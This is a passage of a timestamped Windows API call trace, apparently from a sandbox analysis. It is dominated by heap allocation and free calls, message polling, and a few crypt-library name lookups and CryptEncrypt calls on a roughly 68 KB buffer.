[0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.953] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.953] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.953] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.953] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.953] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.953] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.953] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.953] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.954] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.954] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.955] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x109f6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10a00) returned 1 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0041.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.956] CharLowerBuffW (in: lpsz="byte[68097]", cchLength=0xb | out: lpsz="byte[68097]") returned 0xb [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.956] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.957] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.957] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.958] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.958] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x945a08*, pdwDataLen=0x6ae220*=0x109f6, dwBufLen=0x10a00 | out: pbData=0x945a08*, pdwDataLen=0x6ae220*=0x10a00) returned 1 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.959] RtlAllocateHeap 